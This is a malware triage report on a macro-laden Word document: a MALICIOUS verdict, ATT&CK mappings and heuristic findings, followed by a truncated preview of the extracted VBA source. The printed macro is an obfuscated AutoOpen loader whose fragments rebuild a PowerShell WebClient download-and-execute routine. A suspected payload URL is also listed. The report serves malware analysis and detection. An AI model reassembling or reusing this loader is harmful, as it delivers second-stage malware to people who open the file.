Verdict: MALICIOUS
Risk Score: 304

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses CreateObject/Shell/exec. The AutoOpen macro is present and uses Shell() calls, which are often used to download and execute second-stage payloads. The embedded URL 'http://conceptttb.in/UTlxP+lxP/' is highly suspicious and likely serves as the download source for the payload.
Heuristics (9)
- ClamAV: Doc.Macro.Obfuscation-6398752-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6398752-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://conceptttb.in/UTlxP+lxP/,httlxP+lxPplxP+lxP://liansa89SC7E3 (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 159825 bytes |

SHA-256: 55b110383cb2fa84092048db9a853a58813683de2e419c246c76b9d4670a0bc8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 52 long base64-like blobs)

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YAjTwo"
Sub AutoOpen()
zPzujiX = "KwuJuNi" + "MjGaAwi" + "idzWGzC" + "JBZOuUw"
JNzqSjHiB
CXPOENw = "jwSjbJt" + "pWWcOWV" + "lzYafUA" + "vVuAtmJ"
End Sub
Function iVqhHvuhz()
OjvRcFmsd = "" + vwwZpcw + OFSmWin + WHSJlmF + PTjNqWz + Mid("EMZpNwE5Z3lZsGHUbwMHGXIFOsEprEFeRence.tOStrInG()[1,3]+'x'-JOIn'')sw3wE2", 25, 41) + EwuLPla + oplTHtU + RrDTphL + hviVDjj
IbBGqtn = "iNMwFwK" + "JXaGsNh" + "Rjqiskw" + "bjtBpmW"
stamavRc = "BQqMCuJ" + "cYUBvJI" + "UcNwUdQ" + "OoqKwhC"
zSGwQiwW = "jTwPLoH" + "HkuqTYp" + "IVdzbpH" + "DjFVJGm"
YwCNWQYW = "" + SFBEaFT + NNXrucm + quBhUfk + tmGRtDw + Mid("LRFU5CuTzLf78jw6KYLhAZo(('(DzK &((gv lxP*mdR*lxP).naMe[3,11,2]-JOinlxPlxP)( (D'+'zK+DzKlxPmLlfranc = newlxP+lxP-object System.lxP+lxPNelxP'+'+lxPt.WebClilxP+lp0z32ipThLPBi", 24, 135) + rNFpvLN + zUFfhIm + njULTSh + rinfjHZ
uniVsIsour = "SumhBWV" + "ARCzRZq" + "ZwCnXwF" + "GlFZlPA"
vAtwuTBn = "iSJODoh" + "aSzfmQn" + "PSMCtqR" + "mlsJJTM"
zGtZXcimNAG = "IhIQGVV" + "zskOkJz" + "iEIkiSq" + "TtXsYis"
ZmDpSZ = "" + bnIhRIh + jYaBVpn + kYimcTb + fUPoitP + Mid("hTIJlUdz8xPeptionlxP+l'+'xP.MessaglxP'+'+lxPe;}}lxP).REPLACE(([chAR]'+'52+['+'chAR]86+[chAR]68),[striNG][chA'+'R]92).R'+'EPLACE(lxPO20'+'OTC0LVwcmbWW", 10, 128) + tFnzauS + jjrRkwh + jTUzczE + qzIpzww
sjajYcq = "TtsjPSq" + "TmBuvUB" + "oqVsUtw" + "AupGvKD"
fjtwr = "HfKdvWP" + "pzhVjrN" + "jSEhcCB" + "HmwcEzT"
wXBQSwWWN = "wCdTHnM" + "HqQzwlz" + "qnXnClT" + "bkYSHBA"
tvmpM = "" + niiRCQz + ZoBMzXS + EBAmMNd + QHZpIui + Mid("ST8Il9H3kn2C7Izm8A1mJGRP+lxPhuas);InvolxP+lxPke-IlxP'+'+lxPDzK+DzKtem(mLlhlxP+lxPuas);brealxP+lxPk;}caDzK+DzKlxP+lDzK+DzmoUoQ3IpcPihQW", 24, 97) + WPzkuzw + qoqwjtn + LqMwTiA + zYRoLwX
qNlqNhVz = "aEbuVQD" + "ZCbFXVN" + "NJncTpE" + "RNsoPiW"
BAGWXkIfsY = "qhviBZP" + "kPENdkm" + "nkrwJmm" + "PiMrISJ"
PCoaBkSIIc = "qiFGiji" + "UjWWvzc" + "ujOqESd" + "cBsGvkb"
NoMoNZc = "" + UZNoJVu + zBEAfNj + NzmvHQz + jiprjNk + Mid("zLjQ7IXuh5C2K'+'xPtcDzK+D'+'zKlDzK+DzKxP+lxPh{wrilxP+lxPtDzK+DzKelxP+lxPDzK+DzK-DzK+DzKhostlxPDz'+'K+DzK+l'+'xP mLlxP+lxPl'+'_.ExclxP'+'+lnAzkS", 13, 126) + HvAPJYh + SsHaGIl + pnFafzl + HJIvCGo
SujQWshXzGP = "vYzaHKq" + "GDlVpzu" + "HiUBIMq" + "qjQDNzz"
hmXMSWK = "lrTHRsW" + "TKAwwuj" + "jUEqAqA" + "inuuuzF"
otCKzmktS = "pjWuLrU" + "MROXGXn" + "UUCKRHG" + "OLNNIzH"
PvFYrWRkHo = "" + qStTMJT + skdqzaU + IjDrMIs + BBLGJqp + Mid("0LDzK+DzK'+'P+lxPm'+'DzK+Dz'+'KLlflxP+lx'+'PranclxP+lxP.DlxP+lxPowlxP+lxPnloadlxP+lxPFi'+'le(mLlxP+lxPlabclxP+lxP.TlxP+lDzK+DzKxPoS7EAVEXQlQ", 3, 129) + zWOsiLV + vTpnzkh + dtESDIV + XjLBPKp
uzDbq = "RhMCTdu" + "NOzQPzN" + "MOEPYLX" + "HHoGhUZ"
hcobhCXSw = "nDqTAji" + "mckiGmQ" + "fHBnJHL" + "VGmrzRJ"
pEKcRjOwv = "aYwlIUa" + "LGzPTja" + "lUlRYHc" + "AnSYNOR"
sOGNSstzwP = "" + EYpYkkm + BZbJhal + dMvGJPB + VOFOOhj + Mid("vnrzN2ALqwoCQ7C0lttrilxP+lxPDzK+DzKng'+'(), mLllxpIBOz3i6K3uj6", 19, 31) + sTGRIzi + ujpdjJD + CZEnmSK + fCLjEwi
CaFcj = "KkJWCGI" + "GUrYaCj" + "dGccFwS" + "oAbcPVM"
XiYSUOCko = "QvkEAAj" + "wfHiDvv" + "FNPLQaC" + "vjEzAQV"
JEwVh = "khunkvq" + "YHTaCzi" + "aUzBDXj" + "nLQwvKV"
tVfHDFNNsKf = "" + vkNaXUO + HzwslzW + dopkUMb + OaSlQcH + Mid("T7wMC9wHxP+lxPhuaslxP+lxP = mLlenDzK+DzKv:publilxP+lxPc lxPEOid46OW23LfAbj", 9, 51) + GiDSChP + fkUnAzY + HDrcQcj + CdOkUih
jXYjL = "KvpGrHA" + "PtajQGz" + "DVwUOCH" + "WbIzAXE"
YLMjzjzd = "FphiCiV" + "pihIqYr" + "KQtAVmw" + "HRPGcan"
SoCdJTlz = "UjHrjwK" + "DsANXcO" + "qPLXiPM" + "KPwflFz"
jvZqjVkz = "" + smzKjRB + EizKaKR + IMwqMja + YnPvtsp + Mid("5HsRBsI9).REPLACE(([chAR]109+[chAR]76+[chAR]1'+'08),[striNG][chAR]36)'+')DzK).RePLace(DzKlxPDzK,[stRINg][cHar]39) q2YiEX')-crEplace 'q2Y',[CHaRIczWG7q5", 8, 137) + uPBhGlW + LhbVjVN + tczGKjR + FJmVZzU
PIqzsfok = "zhOqYMJ" + "TvdUYvw" + "iXUjLMf" + "KSojMYp"
cjptmskL = "GPMhnCM" + "zMfHJEZ" + "jUmllV
... (truncated)